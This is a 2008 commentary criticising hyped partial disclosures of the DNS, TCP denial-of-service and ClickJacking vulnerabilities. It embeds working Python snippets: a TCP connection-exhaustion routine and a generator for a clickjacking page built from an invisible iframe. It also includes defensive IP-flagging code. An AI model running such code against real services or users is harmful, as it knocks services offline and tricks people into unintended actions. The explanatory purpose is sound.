Cutting through the spin of vulnerability disclosures

17.10.2008
There are a few highly publicized vulnerabilities at the moment which haven't been completely disclosed and which, it is claimed, could have dire consequences. Only, when the vulnerabilities are finally disclosed, it seems that the whole incident has been somewhat Chicken Little.

There is a sense that the self-publicity and public grandstanding are beginning to hurt the whole idea of open disclosure and mature handling of vulnerabilities. Disclosing at a conference might help the conference organizers and be a publicity boost for the presenter / discoverer, but are we to expect the average Information Security practitioner to attend every Information Security conference on the off chance that a self-aggrandizer will be presenting information on a vulnerability that may or may not actually be relevant?

Setting aside the venue for disclosure, the actual content of what has been partially disclosed in recent months has not been enough to support the idea that partial disclosure is something we're going to have to get used to. This is especially the case once the hype circuit has been allowed to build up to the point that it seems the world is going to end if we don't all suddenly run out and fix a problem that has no public solution and no public definition.

If Kaminsky's DNS flaw is anything to go by, the idea that not disclosing is going to hide anything from the "bad guys" falls flat on its face. The same can be said of the TCP and Web application appliance vulnerabilities that are also being bandied about at the moment. What the discoverers tried (and are trying) to hide was quickly worked out by others who publicly speculated on open mailing lists, and enough information was leaked in the partial disclosures and online demonstrations (where they were provided) to give suitably skilled "bad guys" enough to go on to find and target the flaws. Unfortunately, the baseline skill level required to find the vulnerability isn't high enough for partial disclosure to work as a shield. Fortunately, there are plenty of script kiddies out there who are too lazy and unskilled to find it on their own, but it only takes one who can for the approach to fail.

One of the most respected voices in Information Security, Fyodor, has singled out the TCP Denial of Service issue, using it to voice his displeasure at the increasing use of partial disclosure as a means of releasing vulnerability data. Fyodor's opinion on partial disclosure is simply stated as "put up or shut up!".

Looking at the TCP Denial of Service vulnerability that has only been partially disclosed (full disclosure is promised later this month, at a security conference), Fyodor's assessment (and that of others) is that it has all been seen and done before - mostly by people who didn't then run around claiming the world was going to end. Fyodor steps through his particular take on the vulnerability (at least as he sees it), explaining how it works and how it achieves the same results.

Before going any further, it is important to point out that two completely different vulnerabilities can have the same end effects on a system. The vulnerabilities don't need to be related in any way for this to be the case, but independently working individuals and groups commonly arrive at the same result through different methods. It may even be the case that they share a common starting point and end up in different places, but the vulnerabilities end up being separate. Microsoft recently provided an example of this when their due diligence on a denial of service vulnerability turned up a much worse code execution vulnerability.

Fyodor's approach to the TCP vulnerability relies upon a companion tool to his Nmap security scanner, that he called Ndos (Network Denial of Service). Basically the tool forced a denial of service against listening TCP services by exhausting the resources available on the host system. As Fyodor points out, there are many different ways to achieve this sort of attack and there are even variations which result in the system requiring a reboot, such as claimed by the recent partial disclosure.
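The general shape of this class of attack can be sketched in a few lines. The snippet below is a minimal, loopback-only illustration of resource exhaustion against a listening TCP service - a toy "victim" that never calls accept(), and a client that holds connections open until something gives out. It is an assumption-laden sketch of the technique Fyodor describes, not a reconstruction of Ndos itself; all function names here are hypothetical.

```python
import socket

def start_victim(host="127.0.0.1", backlog=5):
    """A toy 'victim' service that listens but never accepts connections,
    so its accept queue fills up and further connection attempts stall."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))  # pick an ephemeral port
    srv.listen(backlog)
    return srv

def exhaust_connections(host, port, count=20, timeout=0.5):
    """Open up to `count` TCP connections and hold them open without
    sending data. Each held connection ties up a socket and queue slot
    on the victim; once its resources are exhausted, new connection
    attempts time out. Returns the list of sockets successfully held."""
    held = []
    for _ in range(count):
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            held.append(s)  # keep it open; never send, never close
        except OSError:
            s.close()
            break  # the victim stopped answering: resources exhausted
    return held
```

With a backlog of 5, only a handful of the attempted connections complete before the rest stall, which is the whole point: the attacker spends almost nothing, while the victim's queues and descriptors are consumed.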

Fyodor points out that variations of this style of attack have been public since early 2000 and may very well have been around for a while before that.

While it might seem like the world is ending based on the new yet-to-be-disclosed issue, the reality is that the countermeasures are almost the same as for any other network denial of service attack. You find and isolate the attacking IP(s), or add extra capacity to your hosting and networking systems. Anything the vendors can add beyond that is a bonus, but it should always be assumed that, in their default state, the systems being protected cannot protect themselves.
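The "find and isolate the attacking IP(s)" step boils down to counting connection attempts per source over a window and flagging the outliers. A minimal sketch of that idea, assuming you already have a feed of source IPs (from netflow, firewall logs, or similar - the function name and threshold here are illustrative, not from any particular product):

```python
from collections import Counter

def flag_attackers(connection_log, threshold=100):
    """Given an iterable of source IPs (one entry per new connection
    observed in a monitoring window), return the set of IPs whose
    connection count exceeds `threshold`. Real deployments would feed
    the result into firewall block rules or upstream null-routing."""
    counts = Counter(connection_log)
    return {ip for ip, n in counts.items() if n > threshold}
```

The hard part in practice isn't the counting, it's picking a threshold that separates an attacker from a busy NAT gateway - which is why capacity and isolation remain the fallbacks.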

A response to Fyodor's commentary has been posted by those behind the discovery, along with further details that don't really do anything to clear up the confusion over the issue (though they do deliver the equivalent of a limp slap on the wrist for coverage that has been woefully inaccurate and fear-mongering).

Once Pandora's box has been opened, you can't really close it by telling everyone else to just be patient and not provide more details along the way.

On the other hand, ClickJacking, the browser-based attack that was finally disclosed last week after Adobe released a fix, was found to be nothing more than a problem that many beginning Web designers stumble across when learning about Z-Indexing on Web sites (it is acknowledged that there are some other issues that have also been discovered, but they fall more into the realm of blended vulnerabilities). After all of the hype and buildup that preceded the disclosure, the actual disclosure could be seen as a significant letdown for the researchers behind the (re)discovery, RSnake and Jeremiah Grossman. Rather than cutting only the demonstration that targeted a weak application (Flash), the entire initial presentation was dropped, which surely contributed to the overall hype cycle (and delivering it could have stopped that cycle dead in its tracks).
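The Z-Indexing problem referred to is exactly what it sounds like: a transparent iframe stacked above a decoy element, so a click on the visible button actually lands on the framed target page. The sketch below builds that HTML skeleton as a string so the stacking trick is visible in one place; the target URL and function name are placeholders, and any page that permits itself to be framed could be dropped in.

```python
def clickjack_demo_page(target_url="https://example.com/confirm"):
    """Return the HTML skeleton of a classic clickjacking page: a decoy
    button at z-index 1, and a fully transparent iframe layered ABOVE it
    at z-index 2 with opacity 0. The user sees and aims at the button,
    but the click is delivered to whatever the iframe has loaded."""
    return f"""<!DOCTYPE html>
<html><body>
  <button style="position:absolute; top:50px; left:50px; z-index:1;">
    Click for a free prize!
  </button>
  <!-- Invisible frame stacked above the decoy: higher z-index, zero opacity -->
  <iframe src="{target_url}"
          style="position:absolute; top:0; left:0; width:400px; height:200px;
                 z-index:2; opacity:0; border:0;"></iframe>
</body></html>"""
```

Which is also why the basic defence is equally unglamorous: pages that matter simply refuse to be framed (for example via an X-Frame-Options response header), and the stacked layers have nothing to sit on top of.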

It seems strange that two of the strongest names in Web security would be caught out hyping a set of vulnerabilities that have been known about for more than five years, but it does go to show that even in the fairly narrow field of Web security (as part of the overall Information Security sphere) it is still possible to discover something "new" that is actually several years old, and that applications can still be vulnerable to it.

As with the other partial disclosures to date, you're going to have to wait until the next round of security conferences to find out more (have you noticed a trend, yet?).

As with Kaminsky's DNS flaw that preceded them, it seems that nothing really new has been thrown up by these recent partial disclosures. What they should highlight is that there are going to be more problems affecting core Internet technologies (some of which Fyodor mentions) that will regain attention, which isn't necessarily a bad thing.

For people already well versed in the technologies being targeted, a lot of it is going to elicit the response of "well, duh, we already knew that". A response to that will be "Well, why haven't you done anything about it, then?".

Unfortunately for everyone, some of these technologies have become an essential part of our everyday existence and there really isn't anything better out there to replace them with. Even if there was, the cost to completely replace them would be likely to put the economic bailouts to shame. Others have the problem that the very feature that makes them so useful is the same one that the vulnerability researchers are trumpeting as being weak, except there isn't really another way to do the same thing.

To some readers this might read like some sort of mid to late 90s "manifesto", but fair's fair if vulnerability researchers are resurrecting old vulnerabilities from that sort of timeframe (the posturing is also eerily reminiscent of that time).